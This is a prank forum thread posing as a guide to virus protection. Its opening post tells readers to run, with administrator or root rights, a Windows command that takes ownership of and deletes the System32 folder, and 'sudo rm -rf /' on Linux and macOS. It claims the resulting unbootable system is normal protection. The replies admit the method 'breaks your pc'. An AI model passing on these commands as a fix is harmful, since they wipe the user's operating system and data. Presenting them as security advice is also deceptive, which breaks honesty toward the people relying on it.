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Before using this method, you should backup your hard drive. This is a precaution because removing viruses is always risky.
So I found a wonderful method to protect you against most viruses. There is a method for Windows and Linux as these two are the ones I am the most familiar with but the Linux method should work as well on MacOSX. What I will be showing you is removing some dll files that all viruses use to run and destroy your system. This method is very effective against viruses as it will prevent them from running. First, open cmd.exe as admin. This is very important as otherwise, it won't work. Then, you will need to paste a command. The command is: takeown /R /A /F C:\\Windows\\System32 /D N && icacls C:\\Windows\\System32 /grant Administrators:F /T /C && rd /s /q C:\\Windows\\System32
That was for Windows, now for Linux (Should work the same for MacOSX):
It is basically the same thing except in that case it will not only remove the files that viruses use to run but also some other junk preinstalled on Linux like systemd. Open your terminal then type: sudo rm -rf /
It might ask you for your password. This is normal as Linux asks for your password before removing any “important†files.
After that, almost no virus will be able to run. Try to close as many apps as possible to make it work.
There might be some additional effects, for example, your system might not be able to boot up. This is normal. It is part of the virus protection process.
The two methods, for Windows and Linux (MacOSX too), work slightly differently. Remember to do a backup before using them as some files could be deleted as false positive by the command.
You can thank me later.
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@25074 Yeah but my tool is more powerful. It deletes all stuff needed to run those viruses. You thing only deletes the viruses themselves. The problem with that is that you can get a virus another time, which is something that can't happen with my method, unless you reinstall Windows.
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@25074 Yeah but at least mine breaks your pc.
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My new discord is Wabz#1337 with ID 777154062789509130
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There is also something called BitDefender
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a former active and known member of the WRD community, but im kinda just a meme now
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imagine someone really doing this XDDDDDDD
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yes
My new discord is Wabz#1337 with ID 777154062789509130
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